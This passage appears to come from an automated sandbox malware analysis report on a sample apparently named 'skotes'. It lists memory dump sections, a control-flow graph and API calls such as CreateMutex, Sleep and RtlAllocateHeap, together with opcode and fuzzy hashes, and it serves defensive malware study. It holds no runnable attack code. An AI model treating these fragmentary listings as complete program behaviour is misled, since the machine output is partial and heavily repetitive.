                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: bad9ac109b0e1decdd62b0151d074ac529f27a9f082aa02c4e41bd616bf53ea2
                                                                                                                                                                                            • Instruction ID: db7d585806169a2e21fd7edc356ef992e0a4a2f56a168e3e25e02d5cb0a95513
                                                                                                                                                                                            • Opcode Fuzzy Hash: bad9ac109b0e1decdd62b0151d074ac529f27a9f082aa02c4e41bd616bf53ea2
                                                                                                                                                                                            • Instruction Fuzzy Hash: AE2145327903049BEB1C9BACD8857AEB763EBD2350F244619E508D77D5C7B556C08352

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 342 63d82f-63d83a 343 63d848-63d84e 342->343 344 63d83c-63d846 342->344 346 63d850-63d851 343->346 347 63d867-63d878 RtlAllocateHeap 343->347 344->343 345 63d87c-63d887 call 6375f6 344->345 351 63d889-63d88b 345->351 346->347 348 63d853-63d85a call 639dc0 347->348 349 63d87a 347->349 348->345 355 63d85c-63d865 call 638e36 348->355 349->351 355->345 355->347
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0063A813,00000001,00000364,00000006,000000FF,?,0063EE3F,?,00000004,00000000,?,?), ref: 0063D871
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 2d29386379254c056b31eba22ebfa244a3c9b56dae8cb6b58bcceb3ac213fbd0
                                                                                                                                                                                            • Instruction ID: f498e020fbef5a0f64d66d0c010ccd591cbea445c07e80e48410234d1f6882d8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d29386379254c056b31eba22ebfa244a3c9b56dae8cb6b58bcceb3ac213fbd0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F0E232A0122466EB612A72BC01ADB7B5BDF85770F188125FD08A7281DA70FC0186E0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 57040152-0
                                                                                                                                                                                            • Opcode ID: 411c66ca6e46b9a349573580a016b1469da356b716e686aac339ba486a9c68b3
                                                                                                                                                                                            • Instruction ID: 964c8d4d7f75319bfc7114924e55a1d43543dca32d053da8c8a34a3b521d2693
                                                                                                                                                                                            • Opcode Fuzzy Hash: 411c66ca6e46b9a349573580a016b1469da356b716e686aac339ba486a9c68b3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CA11270A816259FDB14DF64C8457DBB7AAFF19321F048169E806D7381EB31EA44CBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID: vc
                                                                                                                                                                                            • API String ID: 3213747228-1240431118
                                                                                                                                                                                            • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
